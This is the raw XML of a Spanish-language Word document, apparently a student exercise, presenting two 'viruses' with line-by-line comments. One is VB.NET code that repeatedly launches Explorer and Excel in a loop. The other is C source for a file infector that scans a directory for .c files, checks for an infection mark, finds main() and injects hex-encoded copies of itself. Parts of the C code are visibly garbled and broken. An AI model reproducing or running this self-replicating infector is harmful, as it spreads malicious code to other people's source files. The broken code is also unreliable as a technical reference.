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944" w:rsidRDefault="00251BA4" w:rsidP="00046366">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VIRUS EN VB</w:t>
      </w:r>
      <w:r w:rsidR="00046366" w:rsidRPr="00046366">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> .NET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046366"/>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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046366" w:rsidRDefault="00046366" w:rsidP="00046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'variable para utilizar de contador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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046366" w:rsidRDefault="00046366" w:rsidP="00046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</w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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 Do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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6366" w:rsidRDefault="00046366" w:rsidP="00046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'EL METODO SHELL TE PERMITE EJECUTAR UN EJECUTABLE QUE LE PONGAS DENTRO DE SU PARENTECIS DENTRO DE LOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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'PARENTECIS VA LA RUTA DEL EJECUTABLE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Shell(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"C:/WINDOWS/explorer.exe"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6366" w:rsidRDefault="00046366" w:rsidP="00046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'HACEMOS UN CONTADOR Y SE LO ASIGNAMOS AL LABEL CREADO EN EL FORM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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X.Text = a + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Shell(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"C:/WINDOWS/Explorer.exe"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6366" w:rsidRDefault="00046366" w:rsidP="00046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X.Text = a + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Shell(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"C:/WINDOWS/Explorer.exe"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6366" w:rsidRDefault="00046366" w:rsidP="00046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X.Text = a + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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'ESTO EJECUTA EL OFFICE </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Shell(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.exe"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6366" w:rsidRDefault="00046366" w:rsidP="00046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X.Text = a + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Shell(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.exe"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6366" w:rsidRDefault="00046366" w:rsidP="00046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X.Text = a + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Shell(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.exe"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6366" w:rsidRDefault="00046366" w:rsidP="00046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EL BUCLE DO LOOP PERMITE EJECUTAR EL PROGRAMA SI O SI AUNQUE SEA UNA VEZ; Y AL ESPECIFICAR ENTRE COMILLAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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'QUE EL LABEL LLEGUE 20 SE SALDRA DEL BUCLE Y DEJARA DE EJECUTAR LOS PROGRAMAS. LLEGA A 20 POR EL CONTADOR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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'QUE PONEMOS A CADA METODO SHELL QUE AUMENTA EN 1 EL LABEL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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Loop Until X.Text = "20"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00046366" w:rsidRDefault="00046366" w:rsidP="00046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6366" w:rsidRDefault="00046366" w:rsidP="00046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46366" w:rsidRDefault="00046366" w:rsidP="00046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046366" w:rsidRDefault="00046366" w:rsidP="00046366"/>
    <w:p w:rsidR="00251BA4" w:rsidRDefault="00251BA4" w:rsidP="00046366"/>
    <w:p w:rsidR="00251BA4" w:rsidRDefault="00251BA4" w:rsidP="00046366"/>
    <w:p w:rsidR="00251BA4" w:rsidRDefault="00251BA4" w:rsidP="00046366"/>
    <w:p w:rsidR="00251BA4" w:rsidRDefault="00251BA4" w:rsidP="00046366"/>
    <w:p w:rsidR="00251BA4" w:rsidRDefault="00251BA4" w:rsidP="00046366"/>
    <w:p w:rsidR="00251BA4" w:rsidRDefault="00251BA4" w:rsidP="00251BA4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VIRUS EN C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="00251BA4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;time.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;dirent.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;elf.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;sys/wait.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="00FF2696" w:rsidP="0055374A">
      <w:r>
        <w:t>//este virus ataca directamente al archivo abriéndolo directamente de la ubicación del disco.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF2696" w:rsidRDefault="00FF2696" w:rsidP="0055374A">
      <w:r>
        <w:t>//declaración de funcion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>void virus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>//metodo main donde se ejecuta el codigo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">int main(int argc, char *argv[]) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//llamamos a la funcion virus para que la ejecute el main que por donde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//aaranca cada programa </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  virus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>// funcion llamada virus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">void virus() </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//declaracion de variables de tipo entero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  int i, hd, fd, readbyte, writebyte, posmain, posbuffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //estructuras y variables que controlas el directorio y sus ficheros:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //variable de tipo DIR para abrir fichero </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  DIR *dd;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //indica que se esta definiendo una estructura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  struct dirent *dirp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //variables de tipo char y array de dos posiciones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  char nibble[2], nibblechar, *readbuffer, *writebuffer,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">       *readmain, *writemain, *bufname, *buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">       //array de tipo char que almacenan hexadecimales </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  char charinclude[] = "23696e636c756465203c737464696f2e683e0a23696e636c756465203c7374646c69622e683e0a23696e636c756465203c7379732f737461742e683e0a23696e636c756465203c756e697374642e683e0a23696e636c756465203c66636e746c2e683e0a23696e636c756465203c74696d652e683e0a23696e636c756465203c646972656e742e683e0a23696e636c756465203c656c662e683e0a23696e636c756465203c7379732f74797065732e683e0a23696e636c756465203c7379732f776169742e683e0a0a766f696420766972757328293b0a0a";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  char charvirus[] = "0a766f69642076697275732829207b0a2020696e7420692c2068642c2066642c2072656164627974652c207772697465627974652c20706f736d61696e2c20706f736275666665723b0a2020444952202a64643b0a202073747275637420646972656e74202a646972703b0a202063686172206e6962626c655b325d2c206e6962626c65636861722c202a726561646275666665722c202a77726974656275666665722c200a202020202020202a726561646d61696e2c202a77726974656d61696e2c202a6275666e616d652c202a6275666665723b0a";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  char charvirusend[] = "0a20206464203d206f70656e64697228222e22293b0a20207768696c65282864697270203d207265616464697228646429293e3029200a202020206966282868643d6f70656e28646972702d3e645f6e616d652c204f5f524457522c203029293e3d3029207b0a ... ";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  /* scan for hosts in current dir */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //guardamos dentro de la varible dd de tipo DIR una fucion de tipo opendir que se usa para abrir un directorio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  dd = opendir(".");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //si dd es mayor a 0 osea que se encuntran bytes  entrara en el bucle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  while dd&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">      if&gt;=0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//proceso de infeccion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">        /* is a C source file? */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        //la funcion strmcp retorna un numero entero mayor menor o igual que cero  es decir compara cadena de caracteres hasta llegar al caracter situado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">        //en la ultima posicion si las cadenas son iguales devuelve 0 si es mayor un numero positivo, menor numero negativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">        //la funcion  strlen calcula el numero de caracteres de la cadena apuntada y comprobamos que sea un fichero .c  o  .C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">        if(!(strcmp(dirp-&gt;d_name+strlen(dirp-&gt;d_name)-2,".c"))|| !(strcmp(dirp-&gt;d_name+strlen(dirp-&gt;d_name)-2,".C"))) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          /* searching infection mark... */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          //la funcion lseek recibe tres parametros el primero es el descriptor del fichero, el segundo es el desplazamiento en el que queremos posicionarnos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          //y el tercero lleva varias contantes y la que se utiliza es SEEK_END que posiciona el puntero en el numero de bytes que especificamos desde el</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  //final del fichero a -30 bytes hacia atras del final del fichero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          lseek(fd, -30, SEEK_END);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          //en la variable bufname  se guardara  la cantidad de memoria para asignar a bytes y se hace un castin para pasarlo a char</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          bufname = (char *)malloc(30);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          //en la variable de tipo int se almacenara lo que lea la funcion read que tiene tres parametro el primero es el descriptor de fichero(fd) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          //que devolvia la funcion opendir, el segundo un puntero al buffer de la memoria que esta variablke tiene alamacenada con la funcion malloc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          //y el tercero es el tamaño que indica el numero de bytes del buffer que queremos leer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          readbyte = read(fd, bufname,30);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">          if</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> /* infection mark not found */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> /* searching main() function... */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //posiciona el puntero a la posicion de inicial del fichero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> lseek(fd, 0, SEEK_SET);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> posmain = posbuffer = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //en la variable buffer se guardara la cantidad de memoria para asignar a bytes y se hace el casting a char ya que es una variable de este tipo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> buffer = (char *)malloc(1024);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> while&gt;0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">              if( &gt;0) || &gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">              posmain += readbyte;//se almacena cada vulta de bucle lo que hay en en la variable readbyte que son los bytes que contenga el fichero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">            //en caso de ser mayor a 0 entrara en este condicional y ejecutara las instrucciones </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">              if(posbuffer&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//en posmain hace de acumulador y almacena la resta que queda de postbuffer y buffer estas dos variables estan </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 posmain += ((int)posbuffer-(int)buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //se posiciona en el fichero en el byte de la resta anterior y arranca desde el principio , byte 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 lseek(fd, posmain, SEEK_SET);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //funcion que por parametro el primero es el descriptor de fichero  , segundo el puntero a un buffer de memoria , el tercero el tamaño de bytes que queremos en este caso leer </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 read(fd, buffer, 80);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //si es mayor a 0 entrara en este condicional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 if&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 //en posmain se almacena la resta de posbuffer y buffer y se le suma 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 posmain += 2 + ((int)posbuffer-(int)buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
